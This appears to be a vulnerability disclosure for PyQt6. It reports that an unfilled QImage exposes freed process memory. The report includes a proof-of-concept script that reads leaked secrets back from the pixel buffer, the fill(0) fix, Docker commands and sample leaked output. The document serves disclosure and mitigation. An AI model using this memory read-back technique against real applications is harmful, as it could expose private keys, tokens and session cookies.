Package manager: pip
Affected modules: PyQt6
Download stats: 1,066,014 monthly (pypistats)
Homepage: https://www.riverbankcomputing.com/software/pyqt/
Module description:
PyQt6 is a comprehensive set of Python bindings for Qt v6. It is implemented as more than 35 extension modules and enables Python to be used as an alternative application development language to C++ on all supported platforms including iOS and Android.
PyQt6 may also be embedded in C++ based applications to allow users of those applications to configure or enhance the functionality of those applications.
Read of uninitialized memory. Possible risk: leak of sensitive data.
Raw process memory is exposed through a QImage instance.
The pixel buffer allocated for a new image is not zeroed, so an image created from a size and format alone contains whatever bytes the allocator hands back, including the contents of already freed objects. Qt documents this constructor as producing uninitialized data and recommends calling fill() before drawing on the image, but from Python the buffer can simply be read back before any drawing happens. The exposed bytes could be used to steal highly sensitive data, such as private keys, auth tokens, session cookies or any other memory artifacts that were recently freed in the same process.
Other image types (QBitmap, QPixmap, etc.) are also affected, and the behaviour is also present in older versions of PyQt (PyQt4, PyQt5).
I've tested it on Ubuntu 24.04 LTS and Debian 12.
A simple PoC is provided in the file PoC.py. It demonstrates two cases:
- leaking the content of a deleted variable
- leaking an arbitrary part of the process memory
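As an added example (this is not the report's PoC.py and not PyQt6 project code), the script below reproduces the allocation pattern described above and places the vulnerable allocation next to the hardened one, using the fill() call that Qt's own documentation recommends. The secret string, the image size and the helper names are constructed for illustration; as with the report's PoC, whether the freed secret actually lands in the new image's buffer depends on the allocator reusing the chunk, so the hit count without fill() is allocator dependent, while with fill(0) it must be zero.

```python
import gc

# Constructed sample secret; mirrors the shape of the value in the report's output.
MARKER = b'{"secret": "leaked!!!!"}'


def find_leaks(buf: bytes, marker: bytes) -> list:
    """Return every offset in buf at which marker occurs (the detection check)."""
    hits, start = [], 0
    while True:
        i = buf.find(marker, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def image_geometry(nbytes: int, width: int = 1024, bytes_per_pixel: int = 4):
    """Pick (width, height) so that an image of that size covers at least nbytes.

    Format_RGB32 stores 4 bytes per pixel, so bytesPerLine() == 4 * width.
    """
    height = -(-nbytes // (width * bytes_per_pixel))  # ceiling division
    return width, height


def qimage_bytes(img) -> bytes:
    """Copy the raw pixel buffer of a QImage into a Python bytes object."""
    # bits() returns a sip.voidptr; asstring() copies exactly sizeInBytes() bytes.
    return img.bits().asstring(img.sizeInBytes())


def allocate_image(width: int, height: int, zero: bool):
    """Vulnerable allocation when zero=False; hardened allocation when zero=True."""
    from PyQt6.QtGui import QImage  # imported lazily so the pure helpers run without Qt

    img = QImage(width, height, QImage.Format.Format_RGB32)
    if zero:
        img.fill(0)  # mitigation: overwrite the fresh buffer before anything reads it
    return img


def leak_demo(zero: bool, repeats: int = 4096) -> int:
    """Plant a secret, free it, allocate a same-sized QImage and count marker hits.

    Whether the freed chunk is reused for the pixel buffer is up to the
    allocator; the report's output shows the case where it is.
    """
    secret = bytearray(MARKER * repeats)
    nbytes = len(secret)
    del secret  # the buffer is freed but, absent fill(), never overwritten
    gc.collect()
    width, height = image_geometry(nbytes)
    img = allocate_image(width, height, zero)
    return len(find_leaks(qimage_bytes(img), MARKER))


if __name__ == "__main__":
    print("marker hits without fill():", leak_demo(zero=False))
    print("marker hits with fill(0):  ", leak_demo(zero=True))
```

The hardened path is the one-line change: call fill() (or construct the QImage from a buffer you control) before the image is read, saved or handed to other code. find_leaks() is the check to run against any buffer you suspect was handed back uninitialized.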
You can use the provided Dockerfile to preserve the environment.
- Build the image
  docker build --tag pyqt6-poc .
- Run the image
  docker run --rm pyqt6-poc
- Expected behaviour
  > docker run --rm pyqt6-poc
  PyQt6 image content 1: b'{"secret": "leaked!!!!"}{"secret": "leaked!!!!"}{"secret": "leak'
  PyQt6 image content 2: b'TB\xe0\x97\x00\x7f;\x00TB\xe0\x97\x00\x7f;\x00"\xfc\x10\xa4\x00UW\x00"\xfc\x10\xa4\x00UW\x00ni\nfc_ohknur\x00\x00f\x00\x00\xb5r\x00\x13\xda\x00pelat_etb'
Please note that the first image contains the value of the secret variable. The second image contains some memory addresses.